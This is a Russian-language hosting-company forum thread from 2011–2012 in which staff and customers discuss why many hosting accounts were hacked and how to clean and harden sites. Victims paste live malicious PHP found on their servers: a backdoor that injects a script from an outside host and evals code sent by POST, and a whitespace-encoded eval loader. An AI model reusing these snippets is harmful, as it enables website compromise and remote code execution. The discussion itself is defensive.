FreeHost.com.UA

Для клиентов => Проблемы на хостинге => Тема начата: Komintern от Октября 31, 2011, 07:29:12 pm



Название: Масовые взломы акаунтов - почему они происходят?
Отправлено: Komintern от Октября 31, 2011, 07:29:12 pm
В последнее время участились жалобы клиентов на то, что их акаунты были взломаны, в файлы добавлен посторонний код или загружены посторонние вредоносные скрипты.
В этой теме хочу обьяснить несколько причин, по которым это случается.

Причина первая - и самая популярная - клиент не следит за changelog-ами и обновлениями используемой CMS.
Уязвимости в joomla, DLE, phpMyAdmin и т.д находят постоянно, поэтому если вы заботитесь о том, чтобы ваши сайты на готовых CMS работали и не были взломаны - хотя бы 2 раза в месяц проверяйте новости на официальном сайте CMS.

Причина вторая - неверные права доступа на файлы и каталоги.
Очень многие клиенты устанавливают права доступа рекурсивно 777. Рекомендуется ознакомиться с тем, что значат данные права:
http://www.tux.in.ua/articles/305 - информация о системе прав в юникс.
Вкратце: права 777 дают полный доступ на чтение, запись и выполнение _всем_. Ни о какой безопасности в таком случае речь идти не может. Если вы хотите значительно уменьшить вероятность взлома акаунта - установите на каталоги 755, а на файлы 644. Это защитит вас даже от тех уязвимостей движка, которые еще не найдены и не описаны на сайте разработчика, т.е от потенциальных дыр. Правильно выставленые права доступа - это залог спокойного сна и программиста, и владельца сайта.

Причина третья - доступ по FTP с инфицированых вирусом машин.
Существует категория вирусов, которые собирают вводимые на машине пароли FTP, затем используют их для модификации файлов на FTP-сервере и добавления туда вирусного кода. Тут не поможет ни обновленная CMS, ни правильные права доступа - владелец хостинг-акаунта всегда имеет права записи по FTP. Поможет тут обновленный хороший антивирус на всех машинах, откуда производится FTP-доступ. Для надежности вы можете в админпанели ограничить доступ по FTP только с довереных адресов. Сделайте это.
Фактически соблюдение этих 3 пунктов сводит к минимуму риск того, что ваши сайты будут взломаны.
Enjoy :)


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: akok от Ноября 01, 2011, 02:16:00 pm
Еще бы статью, о том, что делать если таки взломали :) и о бекапах обязательно.



Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: Komintern от Ноября 01, 2011, 02:25:44 pm
Еще бы статью, о том, что делать если таки взломали :) и о бекапах обязательно.

Если таки взломали, то во-первых можно написать на support@freehost.com.ua, и мы восстановим сайт из резервной копии.
После восстановления _обязательно_ проделать вышеуказаные пункты - обновить CMS, установить 755 рекурсивно на все каталоги и 644 рекурсивно на все файлы и ограничить доступ на FTP только с довереных ip.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: seavolf от Ноября 01, 2011, 06:07:38 pm
А как рекурсивно выставить права на все файлы? С каталогами понятно, а вот с файлами не могу разобраться как это сделать.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: мережевий хробачок™ от Ноября 01, 2011, 10:25:16 pm
Еще бы статью, о том, что делать если таки взломали :) и о бекапах обязательно.
установить 755 рекурсивно на все каталоги и 644 рекурсивно на все файлы.

Не всегда и не везде можно ставить 755. Много где для корректной работы ЦМС требуется на некоторые (!) каталоги устанавливать именно 777, например папки uploads.
Ну а в целом, да, все верно. И вообще - статья полезная и нужная, Андрею - СПАСИБО.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: Komintern от Ноября 02, 2011, 12:15:40 am
А как рекурсивно выставить права на все файлы? С каталогами понятно, а вот с файлами не могу разобраться как это сделать.

Напишите в техподдержку просьбу исправить права доступа, они сделают.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: Komintern от Ноября 02, 2011, 12:17:50 am
Еще бы статью, о том, что делать если таки взломали :) и о бекапах обязательно.
установить 755 рекурсивно на все каталоги и 644 рекурсивно на все файлы.

Не всегда и не везде можно ставить 755. Много где для корректной работы ЦМС требуется на некоторые (!) каталоги устанавливать именно 777, например папки uploads.
Ну а в целом, да, все верно. И вообще - статья полезная и нужная, Андрею - СПАСИБО.

На новых серверах (s11-s26), где http-процессы работают от владельца хостинг-акаунта, нужно именно 755 и 644.
На остальных рекомендуется на тот же uploads выставить владельцем пользователя, а группу www и права 775, на файлы 664, типа так:
Код:
drwxrwxr-x   2 komi  www      12288 Nov  1 22:55 cache
Но уж никак не 777 на все. Вообще к расстановке прав доступа нужно очень внимательно относиться.

Еще хочется сказать пару слов насчет кеширования в CMS. Во многих статьях по оптимизации рекомендуют включать кеширование. Это не всегда оправдано и не всегда ведет к приросту производительности.
Суть такова - кешируются запросы и некоторый контент в определенную директорию, которая со временем вырастает до необьятных размеров, а количество файлов в ней измеряется десятками тысяч - говорю из опыта т.к видел примеры. Так вот, запрос к MySQL в таком случае выполнится гораздо быстрее, чем вытянутся из подобного "кеша" данные не первой свежести. Либо очищайте кеш регулярно по крону, либо просто не включайте его.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: allprices от Ноября 02, 2011, 02:43:53 am
Самая большая проблема по 1 пункту - это использование нелиц. софта, дырки не закрыты.
Пример: Прогоните всех клиентов (таблица jb_board в базе) .. подбор пароля займет макс 1 день и доступ открыт.

2 причина. в мануалах всегда все описано: что и как ставить права.. (основная причина)

3 причина нефиг сохранять пароли в браузераз, тоталах, фтп клиентах. (основная причина)


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: Komintern от Ноября 02, 2011, 08:46:09 am
Если бы кто-то еще читал эти мануалы :)


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: AMBA от Ноября 02, 2011, 02:03:12 pm
Ну вот у меня на днях, залочили один сайт за то что он досит кого-то там. Полез смотреть, да, подложили в пару файлов сайта (при том что сайт по вебу не работает, есть только редирект на форум) шел, и в пару папок скрипты для удалённой атаки. Прошу сапорт, мол дайте логи по доступу на фтп за последние несколько дней. Ответ, файлы заливались не по фтп. И так и не выложили.

Я допускаю конечно что могли пролезть и через веб, и что сапрорт очень профессионален в вопросах взломов, но хотелось бы удостоверится самому. А в админке вместо логов за несколько дней:

Цитировать
Fatal error: Allowed memory size of 67108864 bytes exhausted (tried to allocate 2097123 bytes) in /usr/local/www/docroot/uhtq/getftplog.php on line 15

Причём я в эти дни по фтп с сайтом точно не работал. Также и Access логи просил за последние пару дней по вебу, тоже проигнорили. И на вопрос небыло ли аналогичных случаев у соседей на s11, и не пролезли ли где-то на уровне сервера, тоже не ответили. Значит у меня нет причин сбрасывать и такой вариант со счетов. И как с такой поддержкой искать и закрывать дырку по горячим следам?
Не надо косить только на мануалы, взлом аккаунта это помоему достаточно серьёзный повод чтобы сапорт способствовал пользователю в поиске и устранении причин.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: Komintern от Ноября 02, 2011, 03:20:10 pm
AMBA, какая CMS использовалась на сайте?
Какие права стояли на каталоги, куда были залиты скрипты?
Взломано было достаточно много акаунтов, что привело к возникновению слухов, что "к серверам freehost был получен root-доступ злоумышленниками". Слухи эти ничем не подтверждены и полностью неправдивы, последствия такого явления были бы гораздо больше, чем взлом ~20-30 сайтов из более чем 1000 размеенных на сервере.
90% вероятности, что на каталоги, куда были залиты скрипты, стояли права 777, и скрипты скорее всего были залиты через веб-шелл.
Как и когда был залит шелл - не знает никто, если техподдержка сказала что в FTP-логах (они хранятся у нас за неделю) информации нет - значит вероятнее всего шелл залили давно и не только вам.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: AMBA от Ноября 02, 2011, 04:20:25 pm
Ну это не первая моя просьба скопировать логи, раньше с этим проблем небыло. Просто меня наторожило что 4 дня кряду когда я по фтп не работал, раздутые логи с которыми не справляется ваш скрипт вывода их в админку.

Про слухи о том что взломано 20-30 сайтов я не слышал, я лишь предполагал разные варианты. Но согласитесь, 20-30 сайтов на одном сервере одновременно, очень не похоже на совпадение. Ломать 20 сайтов на одном сервере целенаправленно, ну это по крайней мере странно. Самое вероятное через что могли пролезть ко мне это форум phpBB. На других взломанных аккаунтах стоял этот скрипт?

Да, на файлы и папки которые были изменены и в которые лились посторонние скрипты были права 777, но я думаю что узнать про них и самое главное писать в них, не залив предварительно как-то шелл и не просканировав хост, нереально.
Насколько я успел по диагонали почитать инфо о том шеле который закинули мне, то это один из самых популярных и функциональных, кроме того у него существуют модификации для работы с суидниками. Я не линуксоид, поэтому сразу прошу прощения есмли прогоню в чём-то, но насколько я понял у них есть возможность править первый байт чи бит файла, отвечающий за доступ, таким образом организовывая исполнение файла не от имени пользователя который этот файл создавал, а от имени апача или даже рута. Возможно взломав какой-то один сайт на сервере, они нашли возможность сканировать папки соседних хостов, и найдя у них каталоги/файлы с правами 777 смогли туда что-то дозаписывать. Советую всё же внимательнее изучить возможность перепрыгивания злоумышленников с какого-то из хостов на соседние, надо это исключить, ибо избавиться на 100% от файлов и папок с 777 просто невозможно.

P.S. От меня кстати ддосили какой-то turnitupnowдотnet.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: Komintern от Ноября 02, 2011, 04:43:29 pm
Цитировать
Самое вероятное через что могли пролезть ко мне это форум phpBB. На других взломанных аккаунтах стоял этот скрипт?

Да, почти все недавно взломаные акаунты использовали либо Joomla либо phpBB.

Цитировать
Да, на файлы и папки которые были изменены и в которые лились посторонние скрипты были права 777, но я думаю что узнать про них и самое главное писать в них, не залив предварительно как-то шелл и не просканировав хост, нереально.

Тут использовался тупой метод проб и ошибок. Бот нашел большой список сайтов с определенными CMS и применил к ним автоматизированый эксплойт. Все, которые оказались уязвимыми - получили шелл. Потом опять же автоматом другой бот позаливал через этот шелл скрипты для спама и ддос-а.

Цитировать
насколько я понял у них есть возможность править первый байт чи бит файла, отвечающий за доступ, таким образом организовывая исполнение файла не от имени пользователя который этот файл создавал, а от имени апача или даже рута.

Понятия не имею что за первый байт или бит вы имеете ввиду, но SUID тут точно не при чем, тем более SUID-бит не устанавливается на скрипты, он устанавливается только на бинарники и только root-ом.
Если вы имеете ввиду chown, то при правах 777 он не имеет никакого смысла, т.к писать в каталог может любой пользователь, независимо владелец он каталога или нет.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: AMBA от Ноября 02, 2011, 05:07:05 pm
Ну да наверное речь шла как раз о том, чтобы через этот вебшел ломать сервер более серьёзно.

Цитировать
Установленный suid-бит позволяет выполнять файл от имени владельца файла, а не текущего юзера. Т.е. если дать суиднику права root'a, то можно будет выполнять команды от имени root'a с любого юзера.

Описанная вами схема понятна, а по логам нельзя установить что за дыру использовали, ведь наверняка бот работал с одного ip который вычислить не сложно, и соответственно отследить всё что он делал.

Хуже всего что у меня стоит самая свежая версия форума, и никаких заплаток новых не видно на данный момент.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: Komintern от Ноября 02, 2011, 05:15:35 pm
Описанная вами схема понятна, а по логам нельзя установить что за дыру использовали, ведь наверняка бот работал с одного ip который вычислить не сложно, и соответственно отследить всё что он делал.

Хуже всего что у меня стоит самая свежая версия форума, и никаких заплаток новых не видно на данный момент.

Установить пытаемся, но в приоритете задача не допустить подобного впреть, в связи с чем и была создана эта тема.
Свежая версия форума - это отлично, но опять же - была ли она самой свежей в тот момент (который был неизвестно когда), когда заливали шелл. Он мог лежать месяцами без использования, а потом по набору нужного количества инфицированых акаунтов каждый паразитный скрипт получил команду начать свою активность.
Никто же из владельцев акаунтов не проверяет - не появился ли случаем левый файл в каталоге uploads.
Вот именно из-за подобных инцидентов рекомендуется выставлять правильные права и ограничивать доступ на FTP с довереных айпи.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: AMBA от Ноября 02, 2011, 05:34:25 pm
О, а я только сейчас и заметил что это тема свежая :) Думал что это начали писать в какой-то из старых, автоматом прокрутил на последние посты :)
Кстати я заметил что они подобные шелы зачастую пакуют с использованием base64_decode() и для его исполнения юзают eval(). Может можно выделить группу таких потенциально стрёмных функций, которые в большинстве случаев в обычных сайтах просто не используются и добавить опцию с возможностью их отключить скопом. Такой себе альтернативный сейфмод, хотя конечно не панацея, но всё же.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: Komintern от Ноября 02, 2011, 05:41:38 pm
Думали и над запрещением eval(), возможно в скором времени проведем такой эксперимент.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: AMBA от Ноября 02, 2011, 06:15:37 pm
Ещё эти автоматопакостилки очень чувствительны к расширениям. Эта была заточена на .php с правами 777. Были б расширения скажем ph5, бот бы обламался. Хотя конечно это гемор фиксить какое-то монстроскрипто аля джумлю под другие расширения. Но я подумаю над этим вопросом в своей цмс, у меня там всего-то 2 .php файла :)


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: Komintern от Ноября 03, 2011, 08:01:47 am
Эта настроена на поиск каталогов с правами 777, а с каким расширением заливать скрипт - зависит от сервера, ведь .ph5 может и не обрабатываться на серверной стороне без дополнительных настроек.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: AMBA от Ноября 03, 2011, 05:14:07 pm
Я знаю, поэтому их бот и был настроен на .php файлы. В директории с правами 777 они ложили свои файлы, а в .php файлы с правами 777 дописывали в первую строку свой код для ддоса+возможность передать через $_POST любой php код который бы выполнился. Но вот если бы на хостинге файлы с расширением .php не обрабатывались бы пхп программой, а например по умолчанию были бы только ph5, тогда бы толку от работы такого бота небыло бы никакого. Вопрос только в том что на массовом хостинге такая схема практически нежизнеспособна, большинство скриптов написаны именно под расширение .php.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: akok от Ноября 03, 2011, 08:15:20 pm
Еще есть такая интересная фича как инспектор файлов. Полезный последний рубеж обороны.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: Artu от Ноября 03, 2011, 11:11:26 pm
У меня
сервер s11,
CMS Shop Script Free,
тикет о восстановлении из архива #2011110310004832.

Прошу восстановить как можно скорее.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: AMBA от Ноября 04, 2011, 01:45:12 pm
Еще есть такая интересная фича как инспектор файлов. Полезный последний рубеж обороны.
Насколько я на скорую руку погуглил, не вижу какого-то такого самостоятельного универсального веб решения, есть версии для ПК и модуль под vBulletin.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: Artu от Ноября 04, 2011, 03:23:35 pm
При просмотре одного из зараженных файлов Avast ругается на PHP.Shell-AX[Trj]


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: AMBA от Ноября 04, 2011, 06:36:35 pm
Предлагаешь аваст на сервера фрихосту установить :))


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: Komintern от Января 03, 2012, 06:51:05 pm
Проанализировав большинство случаев взломов акаунтов хостинга, мы внедрили защитную систему SUHOSIN: http://www.hardened-php.net/suhosin/
Теперь в админпанели, в разделе "Настройка PHP" существует возможность выключения потенциально опасных функций PHP, таких как eval(), exec(), shell_exec() и др. Также во избежание нежелательных рассылок можно запретить функцию mail(), если ваш сайт не отсылает почту, и /e-модификатор в preg_replace(), если он не используется на сайте.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: novadesign от Января 04, 2012, 11:33:15 am
В скрипте Timthumb.php была найдена уязвимость. Данный компонент используется во многих готовых CMS, таких как WP. Пожалуйста, ознакомьтесь с информацией.

http://blog.sucuri.net/2011/08/attacks-against-timthumb-php-in-the-wild-list-of-themes-and-plugins-being-scanned.html


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: AMBA от Января 04, 2012, 06:53:48 pm
в разделе "Настройка PHP" существует возможность выключения потенциально опасных функций PHP
Только давай уж по честному, не для ВЫключения, а для Включения, ибо вы их сами взяли и поотрубали.
И я кстати в другой теме просил поподробнее об этом нововведении инфу выложить, график введения на остальных серверах, где?


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: Komintern от Января 04, 2012, 08:06:22 pm
Да, спасибо за уточнение =)
На данный момент SUHOSIN в production-режиме работает на s11-s16 (с выключеными опасными функциями по умолчанию), в тестовом режиме (соответственно с включенными опасными функциями) - на s17-s24. На этих серверах опасные функции будут отключены с 10.01.2012, когда большинство клиентских админов и технических специалистов выйдет на работу.
На серверах, использующих php4, эта система к сожалению внедрена не будет.


Название: Re:Массовые взломы аккаунтов - почему они происходят?
Отправлено: georgith от Января 12, 2012, 07:43:04 pm
Это конечно хорошо - отключить опасные функции!
Но, у меня после этого форум на PHPBB3 перестал работать.
Список открывался, а посты - нет. И в админку невозможно зайти.
Выдавалась ошибка со словом E modifier
Включил я эту функцию. Вроде бы через полтора часа после этого стало возможным просматривать посты.
Но в админку зайти невозможно и ошибок уже не выдает - просто белый экран.
Осталось 17 функций отключенных.
Если по одной включать - это сколько дней нужно потратить, ведь результат часа через полтора проявляется!
Я, думаю, не у одного меня такая проблема с форумами.
Может кто подскажет, какие функции нужно включить?


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: Komintern от Января 13, 2012, 11:26:01 am
В первую очередь нужно включить log_errors, а затем смотреть error-логи через админку.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: AMBA от Января 13, 2012, 03:55:46 pm
Я уже просил создать специальную тему для этого нововведения, видимо прийдётся самому.
Для phpBB надо включить:
Цитировать
chmod()
preg_replace() with /e modifier

P.S. про 1,5 часа это что-то не то, настройки php должны на новых серверах на лету применятся.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: Thorin от Января 13, 2012, 04:24:39 pm
А что для ДЛЕ надо включить кто то скажет?)


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: novadesign от Января 13, 2012, 04:45:45 pm
А что для ДЛЕ надо включить кто то скажет?)

Лучше всего посмотреть логи ошибок. Нужные ф-ции так же зависят от используемых модулей.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: Komintern от Января 13, 2012, 05:14:04 pm
P.S. про 1,5 часа это что-то не то, настройки php должны на новых серверах на лету применятся.

Откуда такая информация? Вы путаете с настройками DNS, они применяются на лету. Применение на лету настроек PHP - это чуть более сложная задача, над ней мы пока работаем.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: georgith от Января 13, 2012, 06:54:43 pm
Я уже просил создать специальную тему для этого нововведения, видимо прийдётся самому.
Для phpBB надо включить:
Цитировать
chmod()
preg_replace() with /e modifier

P.S. про 1,5 часа это что-то не то, настройки php должны на новых серверах на лету применятся.

Две вышеуказанных функции я вчера включил, но проблема с входом в админку форума осталась.
Сегодня изучил лог ошибок, нашел в нем упоминание функции fsockopen()
Включил я эту функцию и через 1 час появился доступ в админку.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: AMBA от Января 13, 2012, 07:03:37 pm
Точно, в течении часа. Видимо мне в последнее время просто везло, применялось сразу :)

Хм, у меня прекрасно входит в админку и всё работает и с отключенной функцией fsockopen(), последняя версия форума.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: AMBA от Февраля 24, 2012, 06:51:02 pm
Обнаружил что ещё форуму нужна функция: escapeshellcmd().


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: Artu от Февраля 28, 2012, 02:10:17 am
Не могу найти отдельную тему про Suhosin? Вообще такое в рассылках должно рассылаться по идее..

Теперь ближе к теме.

Что, теперь прав на каталоги и файлы не достаточно?
Как тут сказано - http://freehost.com.ua/forum/index.php?topic=2124.msg8917#msg8917

И как объяснить что вредоносный скрипт создал файл со своим кодом в корне сайта. Ведь там владелец аккаунта права не устанавливает.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: Artu от Февраля 28, 2012, 02:13:42 am
Запись была произведена даже в корневой файл .htaccess с правами 444.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: Artu от Февраля 28, 2012, 03:13:14 am
Да, спасибо за уточнение =)
На данный момент SUHOSIN в production-режиме работает на s11-s16 (с выключеными опасными функциями по умолчанию), в тестовом режиме (соответственно с включенными опасными функциями) - на s17-s24. На этих серверах опасные функции будут отключены с 10.01.2012, когда большинство клиентских админов и технических специалистов выйдет на работу.
На серверах, использующих php4, эта система к сожалению внедрена не будет.

Не будет?
У меня s12.
Выдает ошибку: "Fatal error: SUHOSIN - Use of preg_replace() with /e modifier is forbidden by configuration inЭю
Включен PHP4. Как обойти ошибку? "Вкл. /E modifier" ?


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: Komintern от Февраля 28, 2012, 08:15:55 am
Насчет записи в корневой файл - это возможно лишь в том случае, если вам ранее был залит шелл, или же если ваш код из-за какой-либо уязвимости позволяет выполнять посторонний код или производить запись в эти файлы.
Относительно версии php - просто разместите phpinfo(); в корне и посмотрите версию, модули и всю информацию.
E-modifier потенциально опасен, т.к как раз и разрешает выполнение кода, но если вашему скрипту он необходим, в панели можете включить этот модификатор в разделе "Настройка РНР".


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: SPEC1AL1ST от Февраля 28, 2012, 02:29:06 pm
Нет вы не правы, у меня такая же проблема, как и у Artu.
При этом проблема на ВСЕХ доменах и сабдоменах, переписываются php файлы в корне, добавляются новые...
Я уже даже фтп доступ по айпи только делал, толку НОЛЬ.

РЕШАЙТЕ ВОПРОС НА УРОВНЕ ХОСТИНГА, А НЕ СБРАСЫВАЙТЕ СВОИ ПРОБЛЕМЫ НА КЛИЕНТОВ! МАССОВОСТЬ ТОЛЬКО НА ФРИХОСТ!


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: Komintern от Февраля 28, 2012, 05:33:39 pm
На техподдержку писали?
Цитировать
При этом проблема на ВСЕХ доменах и сабдоменах

в одном и том же акаунте?
http-процессы работают под пользователем-владельцем акаунта, поэтому достаточно уязвимости в одном сайте, чтобы можно было заразить все сайты в пределах этого акаунта.
на уровне хостинга мы постоянно совершенствуем защитные системы, но даже тот же SUHOSIN не всегда спасает, если код содержит уязвимости.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: SPEC1AL1ST от Февраля 28, 2012, 05:50:49 pm
Ну и что делать? Заражаются даже те, где в PHP настройках отключены все функции.

ВОТ РЕАЛЬНО ЧТО ДЕЛАТЬ!?


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: Komintern от Февраля 28, 2012, 06:56:08 pm
1. Сайты в одном акаунте или нет? Если да, то достаточно одного уязвимого, чтобы взломать все сайты акаунта.
2. Изучать access и error-логи HTTP, если внимательно изучить - вы обязательно найдете где происходит обращение к шеллу или выполняется потенциально опасный запрос.
3. Написать на техподдержку с указанием логина и подробным описанием происходящего - возможно с нашей стороны что-либо посмотрим.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: SPEC1AL1ST от Февраля 29, 2012, 11:46:35 am
http://clip2net.com/s/1E7XH
Вот даже в корне хостинга появляется.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: AMBA от Февраля 29, 2012, 04:30:20 pm
Специалист, самое первое это надо перестать паниковать, а далее изничтожить гадину. Могу подсказать примерно такие действия:
1. Сменить пароли на доступ по фтп;
2. Ограничить доступ по фтп по ip;
3. Открыть "зараженный" php файл и изучить что именно дописывается, скопировать себе вариант этого вредоносного кода куда-то в блокнот, а из зараженного файла код вырезать и сохранить файл.
4. Пройтись поиском по всем фалам, используя для поиска разные части кода из найденного вами зараженного фрагмента (обычно это замысловатые имена переменных), все найденные зараженные файлы пофиксить также как и первый;
5. Если заражено очень много файлов, и вручную вы не в состоянии все их обработать, а у вас стоит какой-то стандартный движок без существенных модификаций, можно заменить большую часть файлов чистыми файлами из дистрибутива;
6. Если у вас не очень большой трафик на сайте, то посмотрев http лог доступа можно и самому найти к каким файлам в последние сутки был доступ и проверить эти файлы на наличие шелл кода.
7. Если вы нашли добавленный "левый" файл, не относящийся к вашему сайту, вы также поискав по имени этого файла в http логе доступа можете найти с какого ip к нему был доступ, вероятнее всего это ip злоумышленника который открывал свой шелл. Для разнообразия можно закрыть доступ с этого адреса (адресов) на ваш хст;
8. Если ничего не получается, напишите запорс в сапорт, укажите подробно с какими аккаунтами проблемы и попросите сапорт помочь вам вычистить файлы или найти уязвимость.


Название: Re:Масовые взломы акаунтов - почему они проис
Отправлено: tourdnepr от Апреля 08, 2012, 02:32:56 pm
На хостинге с января 2010 года.

В сентябре 2011 года в файлы был добавлен код, который рассылал спам (пример одного из них):

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

Все изменяемые файлы были проверены и вредоносный код был удален.
Усилил бдительность и всевозможные средства безопасности.


С конца декабря 2011 и весь января 2012, почти каждый день добавлялись файлы в каталог root и в корень сайта с названиями типа w86675434t.php, w29744403w.php, w27826508w.php, о чем сообщалось в службу поддержки.

С моей стороны принимались все доступные методы безопасности:
1)Пароль  доступа ftp в клиентах не сохраняю, каждый день менял.
2)Включал ограничение доступа по Ip.
3)В панели управления - Настройка PHP - отключал все потенциально опасные функции PHP кроме mail.
4)Практически на все папки стоят права 755, на файлы 644.
4)Файлы CMS были проверены на изменения с оригинальным дистрибутивом, а впоследствии и заменены на них. В самих файлах постоянно контролирую дату изменения файлов.

Все перечисленные способы не помогали.
В феврале 2012 файлы перестали добавляться

8 апреля обнаружил, что 7 апреля на мой сайт были добавлены два файла один в каталог root рядом с каталогом www.tourdnepr.com, второй в корень сайта в каталог www.tourdnepr.com. Постороний файл с названием pagenews.php и содержимым: (удалил только большое количество пробелов)
<?php   $d="
";
$s=substr(0,1);for($i=0;$i<5032;$i=$i+8){$s.=chr(bindec(str_replace(chr(9),1,str_replace(chr(32),0,substr($d,$i,8)))));}eval($s);?>

Сайт находится на s11.
Также сайты с такой CMS находятся на s22 и на других хостингах например hvosting.ua и у них таких проблем нет.

Когда данную проблему начнут воспринимать всерьез?

Я не вижу полной картины на всех серверах хостинга, но по отзывам форума и своим сайтам у меня складывется мнение, что проблема имено в 11 сервере.

Принимаются ли какие-нибудь способы устранения проблемы:
1)анализ настроек на других серверах где нет подобных проблем
2)перенос отдельных клиентов на другие сервера
3)...

--------------------------------------

Давно уже разобрался в чем проблема, вот сейчас нашел время описать.
Проблема как и писали тут была в вредоносном коде который был вставлен в файлы сайта, но самый интересный вопрос как этого избежать. Оказывается если вы устанавливаете модули или компоненты стандартно из под самой CMS то владельцем добавленных файлов становится сама CMS и в эти файлы и внедряют вредоносный код. Во избежании этого, надо зайти в https://admin.freehost.com.ua/ и через  Управление сайтом -> Корректировка прав ФТП пользователя изменить принадлежность установленных файлов. Если файлы уже заражены то их надо заменить на оригинальные из дистрибутива. В моем случае устанавливал модуль mod_flowplayer и через некоторое время начали появляться сторонние файлы. Найдя пораженные файлы заменил их оригинальными из установочного архива модуля и сменил права через админ панель admin.freehost.com.ua. Уже несколько месяцев никаких проблем не наблюдается.
Надеюсь все выше изложенное поможет предотвратить или очистить сайт от вредоносного кода.

на картинке показано что владелец файлов  mod_flowplayer  является 80, тогда как владельцем остальных файлов является 2194
(http://www.tourdnepr.com/images/stories/site/3.jpg)



Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: Komintern от Апреля 09, 2012, 07:25:08 am
Проблема не в 11 сервере. Проблема скорее всего в том, что вам один раз залили php-shell в какую-то из директорий, и периодически через него заливают файлы.
Обратите внимание, что все php-процессы выполняются только от владельца акаунта, поэтому запись в ваш домашний каталог может производить только ваш же логин и процессы, от него запущеные.
Попробуйте не только сверить файлы с дистрибутивом, а и проверить наличие посторонних - не существующих в дистрибутиве файлов. Ну и естественно обновить CMS до последних версий - включая сторонние модули и патчи, зачастую именно в них, в сторонних модулях, и находят подобные уязвимости.


Название: Re:Масовые взломы акаунтов - почему они происходят?
Отправлено: Дети Хоронят Коня от Мая 03, 2012, 02:22:04 pm
http://nazamok.com (http://nazamok.com) - весьма перспективный сервис для отслеживания внедрения в пользовательскую часть сайта различного рода "вирусов".